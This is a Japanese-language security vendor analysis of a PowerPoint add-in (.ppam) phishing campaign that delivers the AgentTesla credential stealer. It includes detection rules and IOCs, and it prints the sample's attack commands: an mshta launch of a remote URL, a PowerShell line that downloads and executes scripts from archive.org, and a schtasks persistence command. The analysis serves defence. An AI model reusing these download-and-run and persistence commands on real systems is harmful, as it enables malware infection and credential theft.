McAfee Labsは、Microsoft PowerPointのマクロ機能を利用した新しいフィッシングキャンペーンを確認しました。このキャンペーンでは、PowerPointのファイルが添付されたスパムメールが送られてきます。悪意のある添付ファイルを開くと、VBAマクロが実行され、AgentTeslaの亜種が配信されます(パスワードを盗むことでよく知られています)。これは、金融取引に関連するメールを装ったスパムメールが送られてきます。
AgentTeslaは、2014年から実行されているRAT(リモートアクセスのトロイの木馬)マルウェアです。このRATはMASS(Malware-As-A-Service)としてスクリーンショット、キーロギング、クリップボードのキャプチャなどの方法で、被害者からユーザー認証情報を盗み出します。その手口は、主にフィッシングキャンペーンを介して行われます。
2021年第2四半期の間に、PowerPointのマルウェアが増加しました。
図1. PPTマルウェアの動向(2021年前半)
このキャンペーンでは、スパムメールに添付された拡張子が.ppamのPowerPointファイルにVBAコードが含まれています。使用されたセンチメントは、図2に示すように「New PO300093 Order」で金融関連のテーマでした。添付ファイル名は「300093.pdf.ppam」です。
図2. スパムメール
PPAMファイル:
このファイルタイプは、Microsoft Office 2007のリリースとともに2007年に導入されました。PowerPointのマクロに対応するOpen XMLのアドインファイルで、追加コマンド、カスタムマクロ、PowerPointのデフォルト機能を拡張するための新しいツールなど、機能を追加するためのコンポーネントが含まれます。
PowerPointはサードパーティが開発した新機能を追加するための「アドイン」をサポートしているため、攻撃者はこの機能を悪用してマクロを自動で実行します。
テクニカルな分析:
「.ppam」ファイルを開くと、図3に示すようなマクロの存在を警告するセキュリティ通知のポップアップが表示されます。
図3.警告文(添付されたPowerPointファイルを開くと表示される)
図4では、ppamファイル内に存在する[Content_Types].xmlファイルの内容からPowerPointのアドイン機能を特定できることがわかります。
図4.マクロが有効化されたPowerPointのアドイン機能
PPAMファイルは次のファイルとディレクトリを含んでおり、抽出して確認が可能です。
- _rels\.rels
- [Content_Types].xml
- ppt\rels\presentation.xml.rels
- ppt\asjdaaasdasdsdaasdsdasasdasddoasddasasddasasdsasdjasddasdoasjdasasddoajsdjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.bin – Malicious file
- ppt\presentation.xml
図5に示すように、マクロを有効化するとユーザーが気づかないうちにアドインがインストールされます。PowerPointにコンテンツやスライドが含まれてないことを確認したユーザーはファイルを閉じますが、バックエンドでマクロコードが実行されて悪意のある活動が始まります。
図5. PowerPointのオプションにインストールされたアドイン
図6に示すように、マクロはアドインのauto_open()イベント内で実行されます。つまり、プレゼンテーションが開かれてアドインがロードされると、直ちにマクロが実行されます。
図6. VBAのauto_open()イベントのコードスニペット
PowerPointのマクロコードを実行すると、図7に示されるmshta.exe(Microsoft HTML Application)を呼び出してURLを起動します。mshtaプロセスは、CreateProcessA()APIを呼び出すことでPowerPointによって起動されます。
CreateProcessA()APIに渡されるパラメータは以下のとおり:
kernel32.CreateProcessA(00000000,mshta hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh,00000000,00000000,00000001,00000020,00000000,00000000,D,
図7. mshtaとURLを含むVBAコードスニペット
mshtaのコマンドラインパラメータは以下のとおり:
mshta hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh
The URL hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh is redirected to “hxxps://p8hj[.]blogspot[.]com/p/27.html” but it didn’t get any response from “27.html” at the time of analysis.
その後、mshta.exeはpowershell.exeを子プロセスとして生成します。
PowerShellのコマンドラインパラメータは以下のとおり:
powershell.exe - ”C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt‘) -useB);i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-2.txt‘) -useB);i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-3.txt‘) -useB);
PowerShell downloads and executed script files from the above-mentioned URLs.
The below Figure 8 shows the content of the first url
PowerShellは上記URLからスクリプトファイルをダウロードして実行します。
以下の図8で示された、ひとつめのURLの内容 – “hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt”:
図8. バイナリファイルの内容
ダウンロードされた各PowerShellファイルには、2つの大きなarrayに格納された2つのバイナリファイルが存在します。 1つ目のファイルはローダーとして機能するEXEファイルで、2つ目のファイルはAgentTeslaの変種であるDLLファイルです。PowerShellは、コマンドラインに記載されたURLからAgentTeslaのペイロードを取得し、それをデコードして、MSBuild.exeを起動してペイロードを取り込みます。
タスクのスケジュール:
継続性を持たせるため、「Task Scheduler」にスケジュールされたタスクを作成、C:Windows®System32SECOTAKSA以下にタスクファイルをドロップして、キャンペーンを効果的に実行します。
図9. 新しいスケジュールタスクを作成するコードスニペット
新しいタスクの名前は「SECOTAKSA」です。「mshta hxxp:// //1230948%1230948@0v2x.blogspot.com/p/27.html」のコマンドを実行して、80分毎に一回呼び出します。
schtasks のコマンドラインパラメータは以下のとおり:
schtasks.exe - “C:\Windows\System32\schtasks.exe” /create /sc MINUTE /mo 80 /tn “”SECOTAKSA”” /F /tr “”\””MsHtA””\””hxxp://1230948%1230948@0v2x.blogspot.com/p/27.html\“”
感染チェーン:
図10. 感染チェーン
プロセスツリー:
図11. プロセスツリー
対策:
McAfee Endpoint Security (ENS)とWindowsシステムセキュリティ(WSS) 製品は、この種のマルウェアをDATでカバーします。
SHA256: fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182を含む悪意のあるPPAMドキュメントは、「W97M/Downloader.dkw」として検出されます。
PPAMドキュメントは、AMSI-FKN! としてENSのAMSI機能でもブロックされます。
さらに、McAfee Endpoint Security製品のエクスプロイト防止機能は、下記エキスパートルールを追加することによってマルウェアの感染チェーンをブロックして、この悪質な攻撃からお客様を保護します。
Expert Rule authored based on the below infection chain:
POWERPNT.EXE –> mshta.exe
Expert Rule:
Rule {
Process {
Include OBJECT_NAME { -v “powerpnt.exe” }
}
Target {
Match PROCESS {
Include OBJECT_NAME { -v “mshta.exe” }
Include PROCESS_CMD_LINE { -v “**http**” }
Include -access “CREATE”
}
}
}
IOCs
URLs:
hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh
hxxp:// //1230948%1230948@0v2x.blogspot.com/p/27.html
hxxps://p8hj[.]blogspot[.]com/p/27.html
hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt
hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-2.txt
hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-3.txt
EML files:
72e910652ad2eb992c955382d8ad61020c0e527b1595619f9c48bf66cc7d15d3
0afd443dedda44cdd7bd4b91341bd87ab1be8d3911d0f1554f45bd7935d3a8d0
fd887fc4787178a97b39753896c556fff9291b6d8c859cdd75027d3611292253
38188d5876e17ea620bbc9a30a24a533515c8c2ea44de23261558bb4cad0f8cb
PPAM files:
fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182
6c45bd6b729d85565948d4f4deb87c8668dcf2b26e3d995ebc1dae1c237b67c3
9df84ffcf27d5dea1c5178d03a2aa9c3fb829351e56aab9a062f03dbf23ed19b
ad9eeff86d7e596168d86e3189d87e63bbb8f56c85bc9d685f154100056593bd
c22313f7e12791be0e5f62e40724ed0d75352ada3227c4ae03a62d6d4a0efe2d
Extracted AgentTesla files:
71b878adf78da89dd9aa5a14592a5e5da50fcbfbc646f1131800d02f8d2d3e99
90674a2a4c31a65afc7dc986bae5da45342e2d6a20159c01587a8e0494c87371
※本ページの内容は2021年9月22日(US時間)更新の以下のMcAfee Enterprise Blogの内容です。
原文: Malicious PowerPoint Documents on the Rise
著者: McAfee Labs (Anuradha M)